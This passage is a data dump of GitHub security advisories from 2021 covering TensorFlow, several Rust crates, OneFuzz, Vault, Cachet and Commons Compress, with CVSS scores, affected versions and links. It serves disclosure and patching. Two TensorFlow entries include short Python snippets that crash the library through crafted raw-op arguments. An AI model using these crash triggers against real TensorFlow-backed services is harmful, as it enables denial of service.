+This vulnerability has been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c545-c4f9-rf6v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37685'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d94ffe08a65400f898241c0374e9edc6fa8ed257'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T17:15:34Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}"
+1.4.0,GHSA-v768-w7m9-2vmm,2021-08-24T15:44:08Z,2021-08-25T14:41:26Z,,['CVE-2021-37676'],Reference binding to nullptr in shape inference,"### Impact
+An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.SparseFillEmptyRows`:
+
+```python
+import tensorflow as tf
+
+tf.compat.v1.disable_v2_behavior()
+tf.raw_ops.SparseFillEmptyRows(
+ indices = tf.constant([], shape=[0, 0], dtype=tf.int64),
+ values = tf.constant([], shape=[0], dtype=tf.int64),
+ dense_shape = tf.constant([], shape=[0], dtype=tf.int64),
+ default_value = 0)
+```
+
+The shape inference [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/ops/sparse_ops.cc#L608-L634) does not validate that the input arguments are not empty tensors.
+
+### Patches
+We have patched the issue in GitHub commit [578e634b4f1c1c684d4b4294f9e5281b2133b3ed](https://github.com/tensorflow/tensorflow/commit/578e634b4f1c1c684d4b4294f9e5281b2133b3ed).
+
+The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by Yakun Zhang of Baidu Security","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-v768-w7m9-2vmm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37676'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/578e634b4f1c1c684d4b4294f9e5281b2133b3ed'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T15:44:08Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}"
+1.4.0,GHSA-g7r5-x7cr-vm3v,2023-06-13T20:01:08Z,2021-08-25T20:58:29Z,,['CVE-2019-15548'],Buffer overflow and format vulnerabilities in ncurses,"ncurses exposes functions from the ncurses library which:
+* Pass buffers without length to C functions that may write an arbitrary amount of data, leading to a buffer overflow. (instr, mvwinstr, etc)
+* Passes rust &str to strings expecting C format arguments, allowing hostile input to execute a format string attack, which trivially allows writing arbitrary data to stack memory (functions in the printw family).
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ncurses'}, 'ecosystem_specific': {'affected_functions': ['ncurses::instr', 'ncurses::mvprintw', 'ncurses::mvwinstr', 'ncurses::mvwprintw', 'ncurses::printw']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.101.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15548'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/issues/106'}, {'type': 'WEB', 'url': 'https://github.com/jeaye/ncurses-rs/issues/172'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeaye/ncurses-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0006.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T17:45:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q5vh-6whw-x745,2021-08-26T21:15:35Z,2021-08-13T20:16:32Z,,['CVE-2021-37705'],Improper Authorization and Origin Validation Error in OneFuzz,"## Impact
+
+Starting with OneFuzz 2.12.0 or greater, an incomplete authorization check allows an authenticated user from any Azure Active Directory tenant to make authorized API calls to a vulnerable OneFuzz instance.
+
+To be vulnerable, a OneFuzz deployment must be:
+* Version 2.12.0 or greater
+* Deployed with the non-default [`--multi_tenant_domain`](https://github.com/microsoft/onefuzz/blob/2.30.0/src/deployment/deploy.py#L1021) option
+
+This can result in read/write access to private data such as:
+* Software vulnerability and crash information
+* Security testing tools
+* Proprietary code and symbols
+
+Via authorized API calls, this also enables tampering with existing data and unauthorized code execution on Azure compute resources.
+
+## Patches
+
+This issue is resolved starting in release 2.31.0, via the addition of application-level check of the bearer token's `issuer` against an administrator-configured allowlist.
+
+## Workarounds
+
+Users can restrict access to the tenant of a deployed OneFuzz instance < 2.31.0 by redeploying in the default configuration, which omits the `--multi_tenant_domain` option.
+
+## References
+
+You can find an overview of the Microsoft Identity Platform [here](https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-overview). This vulnerability applies to the multi-tenant application pattern, as described [here](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-convert-app-to-be-multi-tenant).
+
+## For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [OneFuzz](https://github.com/microsoft/onefuzz)
+* Email us at [fuzzing@microsoft.com](mailto:fuzzing@microsoft.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'onefuzz'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.12.0'}, {'fixed': '2.31.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/microsoft/onefuzz/security/advisories/GHSA-q5vh-6whw-x745'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37705'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/onefuzz/pull/1153'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/onefuzz/commit/2fcb4998887959b4fa11894a068d689189742cb1'}, {'type': 'PACKAGE', 'url': 'https://github.com/microsoft/onefuzz/'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/onefuzz/releases/tag/2.31.0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/onefuzz/'}]","{'cwe_ids': ['CWE-285', 'CWE-346', 'CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-13T20:16:08Z', 'nvd_published_at': '2021-08-13T21:15:00Z'}"
+1.4.0,GHSA-cm5x-837x-jf3c,2021-08-24T13:20:38Z,2021-08-25T14:42:44Z,,['CVE-2021-37660'],Division by 0 in inplace operations,"### Impact
+An attacker can cause a floating point exception by calling inplace operations with crafted arguments that would result in a division by 0:
+
+```python
+import tensorflow as tf
+
+tf.raw_ops.InplaceSub(x=[],i=[-99,-1,-1],v=[1,1,1])
+```
+
+The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/inplace_ops.cc#L283) has a logic error: it should skip processing if `x` and `v` are empty but the code uses `||` instead of `&&`.
+
+### Patches
+We have patched the issue in GitHub commit [e86605c0a336c088b638da02135ea6f9f6753618](https://github.com/tensorflow/tensorflow/commit/e86605c0a336c088b638da02135ea6f9f6753618).
+
+The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cm5x-837x-jf3c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37660'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e86605c0a336c088b638da02135ea6f9f6753618'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:20:38Z', 'nvd_published_at': '2021-08-12T18:15:00Z'}"
+1.4.0,GHSA-fhvc-gp6c-h2wx,2023-06-13T20:33:52Z,2021-08-25T20:52:23Z,,['CVE-2021-26953'],Read on uninitialized buffer in postscript,"Affected versions of this crate passes an uninitialized buffer to a user-provided Read implementation.
+
+Arbitrary Read implementations can read from the uninitialized buffer (memory exposure) and also can return incorrect number of bytes written to the buffer. Reading from uninitialized memory produces undefined values that can quickly invoke undefined behavior.
+
+This flaw was fixed in commit `8026286` by zero-initializing the buffer before handing to a user-provided Read.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'postscript'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26953'}, {'type': 'WEB', 'url': 'https://github.com/bodoni/postscript/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/bodoni/postscript/commit/8026286'}, {'type': 'PACKAGE', 'url': 'https://github.com/bodoni/postscript'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0017.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:35:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-69fv-gw6g-8ccg,2023-06-13T16:50:04Z,2021-08-25T20:43:26Z,,['CVE-2018-20998'],Potential memory corruption in arrayfire,"The attribute repr() added to enums to be compatible with C-FFI caused memory corruption on MSVC toolchain.
+
+arrayfire crates <= version 3.5.0 do not have this issue when used with Rust versions 1.27 or earlier. The issue only started to appear since Rust version 1.28.
+
+The issue seems to be interlinked with which version of Rust is being used.
+
+The issue was fixed in crate 3.6.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'arrayfire'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'arrayfire'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20998'}, {'type': 'WEB', 'url': 'https://github.com/arrayfire/arrayfire-rust/pull/177'}, {'type': 'PACKAGE', 'url': 'https://github.com/arrayfire/arrayfire-rust'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/arrayfire/PYSEC-2019-144.yaml'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0011.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:28Z', 'nvd_published_at': '2019-08-26T18:15:00Z'}"
+1.4.0,GHSA-2vx6-fcw6-hpr6,2021-08-19T20:50:20Z,2021-08-25T20:49:52Z,,['CVE-2020-35917'],Reference counting error in pyo3,An issue was discovered in the pyo3 crate before 0.12.4 for Rust. There is a reference-counting error and use-after-free in From>.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'pyo3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.12.0'}, {'fixed': '0.12.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35917'}, {'type': 'WEB', 'url': 'https://github.com/PyO3/pyo3/pull/1297'}, {'type': 'WEB', 'url': 'https://github.com/PyO3/pyo3/commit/8f81f595dd770b586c7ca7195b42004a6c976eb9'}, {'type': 'PACKAGE', 'url': 'https://github.com/PyO3/pyo3'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0074.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:50:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fp52-qw33-mfmw,2023-08-29T22:39:27Z,2021-08-02T17:11:41Z,,['CVE-2020-16250'],Authentication Bypass by Spoofing and Insufficient Verification of Data Authenticity in Hashicorp Vault,"HashiCorp Vault and Vault Enterprise versions 0.7.1 and newer, when configured with the AWS IAM auth method, may be vulnerable to authentication bypass. Fixed in 1.2.5, 1.3.8, 1.4.4, and 1.5.1..","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.1'}, {'fixed': '1.2.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-16250'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#151'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/vault/'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/159478/Hashicorp-Vault-AWS-IAM-Integration-Authentication-Bypass.html'}]","{'cwe_ids': ['CWE-290', 'CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:55:09Z', 'nvd_published_at': '2020-08-26T15:15:00Z'}"
+1.4.0,GHSA-9jxw-cfrh-jxq6,2022-08-11T00:16:20Z,2021-08-30T16:11:24Z,,['CVE-2021-39172'],Cachet vulnerable to new line injection during configuration edition,"### Impact
+
+Authenticated users, regardless of their privileges (_User_ or _Admin_), can exploit a new line injection in the configuration edition feature (e.g. mail settings) and gain arbitrary code execution on the server.
+
+### Patches
+
+This issue was addressed by improving `UpdateConfigCommandHandler` and preventing the use of new lines characters in new configuration values.
+
+### Workarounds
+
+Only allow trusted source IP addresses to access to the administration dashboard.
+
+### References
+
+- https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection
+
+### For more information
+
+If you have any questions or comments about this advisory, you can contact:
+- The original reporters, by sending an email to vulnerability.research [at] sonarsource.com;
+- The maintainers, by opening an issue on this repository.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cachethq/cachet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/security/advisories/GHSA-9jxw-cfrh-jxq6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39172'}, {'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/commit/6442976c25930cb370c65a22784b9caee7ed1de2'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection/'}, {'type': 'PACKAGE', 'url': 'https://github.com/fiveai/Cachet'}, {'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/releases/tag/v2.5.1'}]","{'cwe_ids': ['CWE-93'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-27T23:35:16Z', 'nvd_published_at': '2021-08-27T23:15:00Z'}"
+1.4.0,GHSA-qc4m-gc8r-mg8m,2021-08-19T20:56:12Z,2021-08-25T20:48:59Z,,['CVE-2020-35885'],Double free in alpm-rs,An issue was discovered in the alpm-rs crate through 2020-08-20 for Rust. StrcCtx performs improper memory deallocation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'alpm-rs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35885'}, {'type': 'WEB', 'url': 'https://github.com/pigeonhands/rust-arch/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/BahNahNah/rust-arch/tree/master/alpm-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0032.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:56:12Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}"
+1.4.0,GHSA-6c65-xcf5-299x,2021-08-18T17:52:08Z,2021-08-25T20:58:25Z,,['CVE-2019-16144'],Uninitialized memory use in generator,"An issue was discovered in the generator crate before 0.6.18 for Rust. Uninitialized memory is used by Scope, done, and yield_ during API calls.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'generator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16144'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/issues/11'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/issues/13'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/issues/14'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/issues/9'}, {'type': 'PACKAGE', 'url': 'https://github.com/Xudong-Huang/generator-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0020.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T17:52:08Z', 'nvd_published_at': '2019-09-09T12:15:00Z'}"
+1.4.0,GHSA-jh37-772x-4hpw,2021-08-24T19:12:12Z,2021-08-25T21:01:52Z,,['CVE-2021-31996'],Double free in algorithmica,"An issue was discovered in the algorithmica crate through 2021-03-07 for Rust. In the affected versions of this crate, `merge_sort::merge()` wildly duplicates and drops ownership of `T` without guarding against double-free. Due to such implementation, simply invoking `merge_sort::merge()` on `Vec` can cause **double free** bugs.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'algorithmica'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31996'}, {'type': 'WEB', 'url': 'https://github.com/AbrarNitk/algorithmica/issues/1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0053.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:52:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-crv7-7245-f45f,2022-02-08T21:08:47Z,2021-08-02T16:55:15Z,,['CVE-2021-35516'],Improper Handling of Length Parameter Inconsistency in Compress,"When reading a specially crafted 7Z archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' sevenz package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.commons:commons-compress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35516'}, {'type': 'WEB', 'url': 'https://commons.apache.org/proper/commons-compress/security-reports.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf5b1016fb15b7118b9a5e16bb0b78cb4f1dfcf7821eb137ab5757c91@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf68442d67eb166f4b6cf0bbbe6c7f99098c12954f37332073c9822ca%40%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211022-0001/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/2'}]","{'cwe_ids': ['CWE-130', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-14T18:11:52Z', 'nvd_published_at': '2021-07-13T08:15:00Z'}"
+1.4.0,GHSA-rmff-f8w9-c9rm,2021-08-18T19:14:45Z,2021-08-25T20:59:22Z,,['CVE-2020-36472'],Data races in max7301,"The `ImmediateIO` and `TransactionalIO` types implement `Sync` for all contained
+`Expander` types regardless of if the `Expander` itself is safe to use
+across threads.
+
+As the `IO` types allow retrieving the `Expander`, this can lead to non-thread
+safe types being sent across threads as part of the `Expander` leading to data
+races.
